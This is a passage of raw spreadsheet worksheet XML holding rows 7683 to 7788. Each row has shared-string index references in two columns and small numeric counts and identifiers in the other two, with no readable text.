      <c r="A7683" t="s">
        <v>16229</v>
      </c>
      <c r="B7683" t="s">
        <v>16219</v>
      </c>
      <c r="C7683">
        <v>0</v>
      </c>
      <c r="D7683">
        <v>925</v>
      </c>
    </row>
    <row r="7684" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7684" t="s">
        <v>16230</v>
      </c>
      <c r="B7684" t="s">
        <v>16220</v>
      </c>
      <c r="C7684">
        <v>0</v>
      </c>
      <c r="D7684">
        <v>925</v>
      </c>
    </row>
    <row r="7685" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7685" t="s">
        <v>16229</v>
      </c>
      <c r="B7685" t="s">
        <v>16221</v>
      </c>
      <c r="C7685">
        <v>18</v>
      </c>
      <c r="D7685">
        <v>925</v>
      </c>
    </row>
    <row r="7686" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7686" t="s">
        <v>16230</v>
      </c>
      <c r="B7686" t="s">
        <v>16222</v>
      </c>
      <c r="C7686">
        <v>20</v>
      </c>
      <c r="D7686">
        <v>925</v>
      </c>
    </row>
    <row r="7687" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7687" t="s">
        <v>16223</v>
      </c>
      <c r="B7687" t="s">
        <v>16223</v>
      </c>
      <c r="C7687">
        <v>6</v>
      </c>
      <c r="D7687">
        <v>925</v>
      </c>
    </row>
    <row r="7688" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7688" t="s">
        <v>16224</v>
      </c>
      <c r="B7688" t="s">
        <v>16224</v>
      </c>
      <c r="C7688">
        <v>1</v>
      </c>
      <c r="D7688">
        <v>925</v>
      </c>
    </row>
    <row r="7689" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7689" t="s">
        <v>16228</v>
      </c>
      <c r="B7689" t="s">
        <v>16211</v>
      </c>
      <c r="C7689">
        <v>0</v>
      </c>
      <c r="D7689">
        <v>946</v>
      </c>
    </row>
    <row r="7690" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7690" t="s">
        <v>16231</v>
      </c>
      <c r="B7690" t="s">
        <v>16212</v>
      </c>
      <c r="C7690">
        <v>0</v>
      </c>
      <c r="D7690">
        <v>946</v>
      </c>
    </row>
    <row r="7691" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7691" t="s">
        <v>16228</v>
      </c>
      <c r="B7691" t="s">
        <v>16213</v>
      </c>
      <c r="C7691">
        <v>0</v>
      </c>
      <c r="D7691">
        <v>946</v>
      </c>
    </row>
    <row r="7692" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7692" t="s">
        <v>16231</v>
      </c>
      <c r="B7692" t="s">
        <v>16214</v>
      </c>
      <c r="C7692">
        <v>0</v>
      </c>
      <c r="D7692">
        <v>946</v>
      </c>
    </row>
    <row r="7693" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7693" t="s">
        <v>16228</v>
      </c>
      <c r="B7693" t="s">
        <v>16215</v>
      </c>
      <c r="C7693">
        <v>0</v>
      </c>
      <c r="D7693">
        <v>946</v>
      </c>
    </row>
    <row r="7694" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7694" t="s">
        <v>16231</v>
      </c>
      <c r="B7694" t="s">
        <v>16216</v>
      </c>
      <c r="C7694">
        <v>3</v>
      </c>
      <c r="D7694">
        <v>946</v>
      </c>
    </row>
    <row r="7695" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7695" t="s">
        <v>16228</v>
      </c>
      <c r="B7695" t="s">
        <v>16217</v>
      </c>
      <c r="C7695">
        <v>7</v>
      </c>
      <c r="D7695">
        <v>946</v>
      </c>
    </row>
    <row r="7696" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7696" t="s">
        <v>16231</v>
      </c>
      <c r="B7696" t="s">
        <v>16218</v>
      </c>
      <c r="C7696">
        <v>0</v>
      </c>
      <c r="D7696">
        <v>946</v>
      </c>
    </row>
    <row r="7697" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7697" t="s">
        <v>16229</v>
      </c>
      <c r="B7697" t="s">
        <v>16219</v>
      </c>
      <c r="C7697">
        <v>0</v>
      </c>
      <c r="D7697">
        <v>946</v>
      </c>
    </row>
    <row r="7698" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7698" t="s">
        <v>16230</v>
      </c>
      <c r="B7698" t="s">
        <v>16220</v>
      </c>
      <c r="C7698">
        <v>0</v>
      </c>
      <c r="D7698">
        <v>946</v>
      </c>
    </row>
    <row r="7699" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7699" t="s">
        <v>16229</v>
      </c>
      <c r="B7699" t="s">
        <v>16221</v>
      </c>
      <c r="C7699">
        <v>0</v>
      </c>
      <c r="D7699">
        <v>946</v>
      </c>
    </row>
    <row r="7700" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7700" t="s">
        <v>16230</v>
      </c>
      <c r="B7700" t="s">
        <v>16222</v>
      </c>
      <c r="C7700">
        <v>0</v>
      </c>
      <c r="D7700">
        <v>946</v>
      </c>
    </row>
    <row r="7701" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7701" t="s">
        <v>16223</v>
      </c>
      <c r="B7701" t="s">
        <v>16223</v>
      </c>
      <c r="C7701">
        <v>6</v>
      </c>
      <c r="D7701">
        <v>946</v>
      </c>
    </row>
    <row r="7702" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7702" t="s">
        <v>16224</v>
      </c>
      <c r="B7702" t="s">
        <v>16224</v>
      </c>
      <c r="C7702">
        <v>1</v>
      </c>
      <c r="D7702">
        <v>946</v>
      </c>
    </row>
    <row r="7703" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7703" t="s">
        <v>16228</v>
      </c>
      <c r="B7703" t="s">
        <v>16211</v>
      </c>
      <c r="C7703">
        <v>0</v>
      </c>
      <c r="D7703">
        <v>1413</v>
      </c>
    </row>
    <row r="7704" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7704" t="s">
        <v>16231</v>
      </c>
      <c r="B7704" t="s">
        <v>16212</v>
      </c>
      <c r="C7704">
        <v>0</v>
      </c>
      <c r="D7704">
        <v>1413</v>
      </c>
    </row>
    <row r="7705" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7705" t="s">
        <v>16228</v>
      </c>
      <c r="B7705" t="s">
        <v>16213</v>
      </c>
      <c r="C7705">
        <v>0</v>
      </c>
      <c r="D7705">
        <v>1413</v>
      </c>
    </row>
    <row r="7706" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7706" t="s">
        <v>16231</v>
      </c>
      <c r="B7706" t="s">
        <v>16214</v>
      </c>
      <c r="C7706">
        <v>0</v>
      </c>
      <c r="D7706">
        <v>1413</v>
      </c>
    </row>
    <row r="7707" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7707" t="s">
        <v>16228</v>
      </c>
      <c r="B7707" t="s">
        <v>16215</v>
      </c>
      <c r="C7707">
        <v>0</v>
      </c>
      <c r="D7707">
        <v>1413</v>
      </c>
    </row>
    <row r="7708" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7708" t="s">
        <v>16231</v>
      </c>
      <c r="B7708" t="s">
        <v>16216</v>
      </c>
      <c r="C7708">
        <v>1</v>
      </c>
      <c r="D7708">
        <v>1413</v>
      </c>
    </row>
    <row r="7709" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7709" t="s">
        <v>16228</v>
      </c>
      <c r="B7709" t="s">
        <v>16217</v>
      </c>
      <c r="C7709">
        <v>3</v>
      </c>
      <c r="D7709">
        <v>1413</v>
      </c>
    </row>
    <row r="7710" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7710" t="s">
        <v>16231</v>
      </c>
      <c r="B7710" t="s">
        <v>16218</v>
      </c>
      <c r="C7710">
        <v>0</v>
      </c>
      <c r="D7710">
        <v>1413</v>
      </c>
    </row>
    <row r="7711" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7711" t="s">
        <v>16229</v>
      </c>
      <c r="B7711" t="s">
        <v>16219</v>
      </c>
      <c r="C7711">
        <v>1</v>
      </c>
      <c r="D7711">
        <v>1413</v>
      </c>
    </row>
    <row r="7712" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7712" t="s">
        <v>16230</v>
      </c>
      <c r="B7712" t="s">
        <v>16220</v>
      </c>
      <c r="C7712">
        <v>0</v>
      </c>
      <c r="D7712">
        <v>1413</v>
      </c>
    </row>
    <row r="7713" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7713" t="s">
        <v>16229</v>
      </c>
      <c r="B7713" t="s">
        <v>16221</v>
      </c>
      <c r="C7713">
        <v>10</v>
      </c>
      <c r="D7713">
        <v>1413</v>
      </c>
    </row>
    <row r="7714" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7714" t="s">
        <v>16230</v>
      </c>
      <c r="B7714" t="s">
        <v>16222</v>
      </c>
      <c r="C7714">
        <v>0</v>
      </c>
      <c r="D7714">
        <v>1413</v>
      </c>
    </row>
    <row r="7715" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7715" t="s">
        <v>16223</v>
      </c>
      <c r="B7715" t="s">
        <v>16223</v>
      </c>
      <c r="C7715">
        <v>25</v>
      </c>
      <c r="D7715">
        <v>1413</v>
      </c>
    </row>
    <row r="7716" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7716" t="s">
        <v>16224</v>
      </c>
      <c r="B7716" t="s">
        <v>16224</v>
      </c>
      <c r="C7716">
        <v>1</v>
      </c>
      <c r="D7716">
        <v>1413</v>
      </c>
    </row>
    <row r="7717" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7717" t="s">
        <v>16228</v>
      </c>
      <c r="B7717" t="s">
        <v>16211</v>
      </c>
      <c r="C7717">
        <v>0</v>
      </c>
      <c r="D7717">
        <v>4571</v>
      </c>
    </row>
    <row r="7718" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7718" t="s">
        <v>16231</v>
      </c>
      <c r="B7718" t="s">
        <v>16212</v>
      </c>
      <c r="C7718">
        <v>0</v>
      </c>
      <c r="D7718">
        <v>4571</v>
      </c>
    </row>
    <row r="7719" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7719" t="s">
        <v>16228</v>
      </c>
      <c r="B7719" t="s">
        <v>16213</v>
      </c>
      <c r="C7719">
        <v>0</v>
      </c>
      <c r="D7719">
        <v>4571</v>
      </c>
    </row>
    <row r="7720" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7720" t="s">
        <v>16231</v>
      </c>
      <c r="B7720" t="s">
        <v>16214</v>
      </c>
      <c r="C7720">
        <v>0</v>
      </c>
      <c r="D7720">
        <v>4571</v>
      </c>
    </row>
    <row r="7721" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7721" t="s">
        <v>16228</v>
      </c>
      <c r="B7721" t="s">
        <v>16215</v>
      </c>
      <c r="C7721">
        <v>1</v>
      </c>
      <c r="D7721">
        <v>4571</v>
      </c>
    </row>
    <row r="7722" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7722" t="s">
        <v>16231</v>
      </c>
      <c r="B7722" t="s">
        <v>16216</v>
      </c>
      <c r="C7722">
        <v>1</v>
      </c>
      <c r="D7722">
        <v>4571</v>
      </c>
    </row>
    <row r="7723" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7723" t="s">
        <v>16228</v>
      </c>
      <c r="B7723" t="s">
        <v>16217</v>
      </c>
      <c r="C7723">
        <v>2</v>
      </c>
      <c r="D7723">
        <v>4571</v>
      </c>
    </row>
    <row r="7724" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7724" t="s">
        <v>16231</v>
      </c>
      <c r="B7724" t="s">
        <v>16218</v>
      </c>
      <c r="C7724">
        <v>0</v>
      </c>
      <c r="D7724">
        <v>4571</v>
      </c>
    </row>
    <row r="7725" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7725" t="s">
        <v>16229</v>
      </c>
      <c r="B7725" t="s">
        <v>16219</v>
      </c>
      <c r="C7725">
        <v>0</v>
      </c>
      <c r="D7725">
        <v>4571</v>
      </c>
    </row>
    <row r="7726" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7726" t="s">
        <v>16230</v>
      </c>
      <c r="B7726" t="s">
        <v>16220</v>
      </c>
      <c r="C7726">
        <v>0</v>
      </c>
      <c r="D7726">
        <v>4571</v>
      </c>
    </row>
    <row r="7727" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7727" t="s">
        <v>16229</v>
      </c>
      <c r="B7727" t="s">
        <v>16221</v>
      </c>
      <c r="C7727">
        <v>6</v>
      </c>
      <c r="D7727">
        <v>4571</v>
      </c>
    </row>
    <row r="7728" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7728" t="s">
        <v>16230</v>
      </c>
      <c r="B7728" t="s">
        <v>16222</v>
      </c>
      <c r="C7728">
        <v>2</v>
      </c>
      <c r="D7728">
        <v>4571</v>
      </c>
    </row>
    <row r="7729" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7729" t="s">
        <v>16223</v>
      </c>
      <c r="B7729" t="s">
        <v>16223</v>
      </c>
      <c r="C7729">
        <v>350</v>
      </c>
      <c r="D7729">
        <v>4571</v>
      </c>
    </row>
    <row r="7730" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7730" t="s">
        <v>16224</v>
      </c>
      <c r="B7730" t="s">
        <v>16224</v>
      </c>
      <c r="C7730">
        <v>0</v>
      </c>
      <c r="D7730">
        <v>4571</v>
      </c>
    </row>
    <row r="7731" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7731" t="s">
        <v>16228</v>
      </c>
      <c r="B7731" t="s">
        <v>16211</v>
      </c>
      <c r="C7731">
        <v>0</v>
      </c>
      <c r="D7731">
        <v>895</v>
      </c>
    </row>
    <row r="7732" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7732" t="s">
        <v>16231</v>
      </c>
      <c r="B7732" t="s">
        <v>16212</v>
      </c>
      <c r="C7732">
        <v>0</v>
      </c>
      <c r="D7732">
        <v>895</v>
      </c>
    </row>
    <row r="7733" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7733" t="s">
        <v>16228</v>
      </c>
      <c r="B7733" t="s">
        <v>16213</v>
      </c>
      <c r="C7733">
        <v>0</v>
      </c>
      <c r="D7733">
        <v>895</v>
      </c>
    </row>
    <row r="7734" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7734" t="s">
        <v>16231</v>
      </c>
      <c r="B7734" t="s">
        <v>16214</v>
      </c>
      <c r="C7734">
        <v>0</v>
      </c>
      <c r="D7734">
        <v>895</v>
      </c>
    </row>
    <row r="7735" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7735" t="s">
        <v>16228</v>
      </c>
      <c r="B7735" t="s">
        <v>16215</v>
      </c>
      <c r="C7735">
        <v>14</v>
      </c>
      <c r="D7735">
        <v>895</v>
      </c>
    </row>
    <row r="7736" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7736" t="s">
        <v>16231</v>
      </c>
      <c r="B7736" t="s">
        <v>16216</v>
      </c>
      <c r="C7736">
        <v>6</v>
      </c>
      <c r="D7736">
        <v>895</v>
      </c>
    </row>
    <row r="7737" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7737" t="s">
        <v>16228</v>
      </c>
      <c r="B7737" t="s">
        <v>16217</v>
      </c>
      <c r="C7737">
        <v>4</v>
      </c>
      <c r="D7737">
        <v>895</v>
      </c>
    </row>
    <row r="7738" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7738" t="s">
        <v>16231</v>
      </c>
      <c r="B7738" t="s">
        <v>16218</v>
      </c>
      <c r="C7738">
        <v>19</v>
      </c>
      <c r="D7738">
        <v>895</v>
      </c>
    </row>
    <row r="7739" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7739" t="s">
        <v>16229</v>
      </c>
      <c r="B7739" t="s">
        <v>16219</v>
      </c>
      <c r="C7739">
        <v>4</v>
      </c>
      <c r="D7739">
        <v>895</v>
      </c>
    </row>
    <row r="7740" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7740" t="s">
        <v>16230</v>
      </c>
      <c r="B7740" t="s">
        <v>16220</v>
      </c>
      <c r="C7740">
        <v>19</v>
      </c>
      <c r="D7740">
        <v>895</v>
      </c>
    </row>
    <row r="7741" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7741" t="s">
        <v>16229</v>
      </c>
      <c r="B7741" t="s">
        <v>16221</v>
      </c>
      <c r="C7741">
        <v>21</v>
      </c>
      <c r="D7741">
        <v>895</v>
      </c>
    </row>
    <row r="7742" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7742" t="s">
        <v>16230</v>
      </c>
      <c r="B7742" t="s">
        <v>16222</v>
      </c>
      <c r="C7742">
        <v>26</v>
      </c>
      <c r="D7742">
        <v>895</v>
      </c>
    </row>
    <row r="7743" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7743" t="s">
        <v>16223</v>
      </c>
      <c r="B7743" t="s">
        <v>16223</v>
      </c>
      <c r="C7743">
        <v>26</v>
      </c>
      <c r="D7743">
        <v>895</v>
      </c>
    </row>
    <row r="7744" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7744" t="s">
        <v>16224</v>
      </c>
      <c r="B7744" t="s">
        <v>16224</v>
      </c>
      <c r="C7744">
        <v>1</v>
      </c>
      <c r="D7744">
        <v>895</v>
      </c>
    </row>
    <row r="7745" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7745" t="s">
        <v>16228</v>
      </c>
      <c r="B7745" t="s">
        <v>16211</v>
      </c>
      <c r="C7745">
        <v>0</v>
      </c>
      <c r="D7745">
        <v>80</v>
      </c>
    </row>
    <row r="7746" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7746" t="s">
        <v>16231</v>
      </c>
      <c r="B7746" t="s">
        <v>16212</v>
      </c>
      <c r="C7746">
        <v>0</v>
      </c>
      <c r="D7746">
        <v>80</v>
      </c>
    </row>
    <row r="7747" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7747" t="s">
        <v>16228</v>
      </c>
      <c r="B7747" t="s">
        <v>16213</v>
      </c>
      <c r="C7747">
        <v>0</v>
      </c>
      <c r="D7747">
        <v>80</v>
      </c>
    </row>
    <row r="7748" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7748" t="s">
        <v>16231</v>
      </c>
      <c r="B7748" t="s">
        <v>16214</v>
      </c>
      <c r="C7748">
        <v>0</v>
      </c>
      <c r="D7748">
        <v>80</v>
      </c>
    </row>
    <row r="7749" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7749" t="s">
        <v>16228</v>
      </c>
      <c r="B7749" t="s">
        <v>16215</v>
      </c>
      <c r="C7749">
        <v>8</v>
      </c>
      <c r="D7749">
        <v>80</v>
      </c>
    </row>
    <row r="7750" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7750" t="s">
        <v>16231</v>
      </c>
      <c r="B7750" t="s">
        <v>16216</v>
      </c>
      <c r="C7750">
        <v>4</v>
      </c>
      <c r="D7750">
        <v>80</v>
      </c>
    </row>
    <row r="7751" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7751" t="s">
        <v>16228</v>
      </c>
      <c r="B7751" t="s">
        <v>16217</v>
      </c>
      <c r="C7751">
        <v>20</v>
      </c>
      <c r="D7751">
        <v>80</v>
      </c>
    </row>
    <row r="7752" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7752" t="s">
        <v>16231</v>
      </c>
      <c r="B7752" t="s">
        <v>16218</v>
      </c>
      <c r="C7752">
        <v>2</v>
      </c>
      <c r="D7752">
        <v>80</v>
      </c>
    </row>
    <row r="7753" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7753" t="s">
        <v>16229</v>
      </c>
      <c r="B7753" t="s">
        <v>16219</v>
      </c>
      <c r="C7753">
        <v>0</v>
      </c>
      <c r="D7753">
        <v>80</v>
      </c>
    </row>
    <row r="7754" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7754" t="s">
        <v>16230</v>
      </c>
      <c r="B7754" t="s">
        <v>16220</v>
      </c>
      <c r="C7754">
        <v>0</v>
      </c>
      <c r="D7754">
        <v>80</v>
      </c>
    </row>
    <row r="7755" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7755" t="s">
        <v>16229</v>
      </c>
      <c r="B7755" t="s">
        <v>16221</v>
      </c>
      <c r="C7755">
        <v>40</v>
      </c>
      <c r="D7755">
        <v>80</v>
      </c>
    </row>
    <row r="7756" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7756" t="s">
        <v>16230</v>
      </c>
      <c r="B7756" t="s">
        <v>16222</v>
      </c>
      <c r="C7756">
        <v>5</v>
      </c>
      <c r="D7756">
        <v>80</v>
      </c>
    </row>
    <row r="7757" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7757" t="s">
        <v>16223</v>
      </c>
      <c r="B7757" t="s">
        <v>16223</v>
      </c>
      <c r="C7757">
        <v>25</v>
      </c>
      <c r="D7757">
        <v>80</v>
      </c>
    </row>
    <row r="7758" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7758" t="s">
        <v>16224</v>
      </c>
      <c r="B7758" t="s">
        <v>16224</v>
      </c>
      <c r="C7758">
        <v>0</v>
      </c>
      <c r="D7758">
        <v>80</v>
      </c>
    </row>
    <row r="7759" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7759" t="s">
        <v>16228</v>
      </c>
      <c r="B7759" t="s">
        <v>16211</v>
      </c>
      <c r="C7759">
        <v>0</v>
      </c>
      <c r="D7759">
        <v>2731</v>
      </c>
    </row>
    <row r="7760" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7760" t="s">
        <v>16231</v>
      </c>
      <c r="B7760" t="s">
        <v>16212</v>
      </c>
      <c r="C7760">
        <v>1</v>
      </c>
      <c r="D7760">
        <v>2731</v>
      </c>
    </row>
    <row r="7761" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7761" t="s">
        <v>16228</v>
      </c>
      <c r="B7761" t="s">
        <v>16213</v>
      </c>
      <c r="C7761">
        <v>3</v>
      </c>
      <c r="D7761">
        <v>2731</v>
      </c>
    </row>
    <row r="7762" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7762" t="s">
        <v>16231</v>
      </c>
      <c r="B7762" t="s">
        <v>16214</v>
      </c>
      <c r="C7762">
        <v>0</v>
      </c>
      <c r="D7762">
        <v>2731</v>
      </c>
    </row>
    <row r="7763" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7763" t="s">
        <v>16228</v>
      </c>
      <c r="B7763" t="s">
        <v>16215</v>
      </c>
      <c r="C7763">
        <v>3</v>
      </c>
      <c r="D7763">
        <v>2731</v>
      </c>
    </row>
    <row r="7764" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7764" t="s">
        <v>16231</v>
      </c>
      <c r="B7764" t="s">
        <v>16216</v>
      </c>
      <c r="C7764">
        <v>2</v>
      </c>
      <c r="D7764">
        <v>2731</v>
      </c>
    </row>
    <row r="7765" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7765" t="s">
        <v>16228</v>
      </c>
      <c r="B7765" t="s">
        <v>16217</v>
      </c>
      <c r="C7765">
        <v>3</v>
      </c>
      <c r="D7765">
        <v>2731</v>
      </c>
    </row>
    <row r="7766" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7766" t="s">
        <v>16231</v>
      </c>
      <c r="B7766" t="s">
        <v>16218</v>
      </c>
      <c r="C7766">
        <v>3</v>
      </c>
      <c r="D7766">
        <v>2731</v>
      </c>
    </row>
    <row r="7767" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7767" t="s">
        <v>16229</v>
      </c>
      <c r="B7767" t="s">
        <v>16219</v>
      </c>
      <c r="C7767">
        <v>0</v>
      </c>
      <c r="D7767">
        <v>2731</v>
      </c>
    </row>
    <row r="7768" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7768" t="s">
        <v>16230</v>
      </c>
      <c r="B7768" t="s">
        <v>16220</v>
      </c>
      <c r="C7768">
        <v>0</v>
      </c>
      <c r="D7768">
        <v>2731</v>
      </c>
    </row>
    <row r="7769" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7769" t="s">
        <v>16229</v>
      </c>
      <c r="B7769" t="s">
        <v>16221</v>
      </c>
      <c r="C7769">
        <v>50</v>
      </c>
      <c r="D7769">
        <v>2731</v>
      </c>
    </row>
    <row r="7770" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7770" t="s">
        <v>16230</v>
      </c>
      <c r="B7770" t="s">
        <v>16222</v>
      </c>
      <c r="C7770">
        <v>350</v>
      </c>
      <c r="D7770">
        <v>2731</v>
      </c>
    </row>
    <row r="7771" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7771" t="s">
        <v>16223</v>
      </c>
      <c r="B7771" t="s">
        <v>16223</v>
      </c>
      <c r="C7771">
        <v>25</v>
      </c>
      <c r="D7771">
        <v>2731</v>
      </c>
    </row>
    <row r="7772" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7772" t="s">
        <v>16224</v>
      </c>
      <c r="B7772" t="s">
        <v>16224</v>
      </c>
      <c r="C7772">
        <v>2</v>
      </c>
      <c r="D7772">
        <v>2731</v>
      </c>
    </row>
    <row r="7773" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7773" t="s">
        <v>16228</v>
      </c>
      <c r="B7773" t="s">
        <v>16211</v>
      </c>
      <c r="C7773">
        <v>0</v>
      </c>
      <c r="D7773">
        <v>1117</v>
      </c>
    </row>
    <row r="7774" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7774" t="s">
        <v>16231</v>
      </c>
      <c r="B7774" t="s">
        <v>16212</v>
      </c>
      <c r="C7774">
        <v>0</v>
      </c>
      <c r="D7774">
        <v>1117</v>
      </c>
    </row>
    <row r="7775" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7775" t="s">
        <v>16228</v>
      </c>
      <c r="B7775" t="s">
        <v>16213</v>
      </c>
      <c r="C7775">
        <v>0</v>
      </c>
      <c r="D7775">
        <v>1117</v>
      </c>
    </row>
    <row r="7776" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7776" t="s">
        <v>16231</v>
      </c>
      <c r="B7776" t="s">
        <v>16214</v>
      </c>
      <c r="C7776">
        <v>0</v>
      </c>
      <c r="D7776">
        <v>1117</v>
      </c>
    </row>
    <row r="7777" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7777" t="s">
        <v>16228</v>
      </c>
      <c r="B7777" t="s">
        <v>16215</v>
      </c>
      <c r="C7777">
        <v>2</v>
      </c>
      <c r="D7777">
        <v>1117</v>
      </c>
    </row>
    <row r="7778" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7778" t="s">
        <v>16231</v>
      </c>
      <c r="B7778" t="s">
        <v>16216</v>
      </c>
      <c r="C7778">
        <v>2</v>
      </c>
      <c r="D7778">
        <v>1117</v>
      </c>
    </row>
    <row r="7779" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7779" t="s">
        <v>16228</v>
      </c>
      <c r="B7779" t="s">
        <v>16217</v>
      </c>
      <c r="C7779">
        <v>4</v>
      </c>
      <c r="D7779">
        <v>1117</v>
      </c>
    </row>
    <row r="7780" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7780" t="s">
        <v>16231</v>
      </c>
      <c r="B7780" t="s">
        <v>16218</v>
      </c>
      <c r="C7780">
        <v>0</v>
      </c>
      <c r="D7780">
        <v>1117</v>
      </c>
    </row>
    <row r="7781" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7781" t="s">
        <v>16229</v>
      </c>
      <c r="B7781" t="s">
        <v>16219</v>
      </c>
      <c r="C7781">
        <v>0</v>
      </c>
      <c r="D7781">
        <v>1117</v>
      </c>
    </row>
    <row r="7782" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7782" t="s">
        <v>16230</v>
      </c>
      <c r="B7782" t="s">
        <v>16220</v>
      </c>
      <c r="C7782">
        <v>0</v>
      </c>
      <c r="D7782">
        <v>1117</v>
      </c>
    </row>
    <row r="7783" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7783" t="s">
        <v>16229</v>
      </c>
      <c r="B7783" t="s">
        <v>16221</v>
      </c>
      <c r="C7783">
        <v>0</v>
      </c>
      <c r="D7783">
        <v>1117</v>
      </c>
    </row>
    <row r="7784" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7784" t="s">
        <v>16230</v>
      </c>
      <c r="B7784" t="s">
        <v>16222</v>
      </c>
      <c r="C7784">
        <v>0</v>
      </c>
      <c r="D7784">
        <v>1117</v>
      </c>
    </row>
    <row r="7785" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7785" t="s">
        <v>16223</v>
      </c>
      <c r="B7785" t="s">
        <v>16223</v>
      </c>
      <c r="C7785">
        <v>0</v>
      </c>
      <c r="D7785">
        <v>1117</v>
      </c>
    </row>
    <row r="7786" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7786" t="s">
        <v>16224</v>
      </c>
      <c r="B7786" t="s">
        <v>16224</v>
      </c>
      <c r="C7786">
        <v>0</v>
      </c>
      <c r="D7786">
        <v>1117</v>
      </c>
    </row>
    <row r="7787" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7787" t="s">
        <v>16223</v>
      </c>
      <c r="B7787" t="s">
        <v>16223</v>
      </c>
      <c r="C7787">
        <v>26</v>
      </c>
      <c r="D7787">
        <v>1117</v>
      </c>
    </row>
    <row r="7788" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7788" t="s">
        <v>16224</v>
      </c>
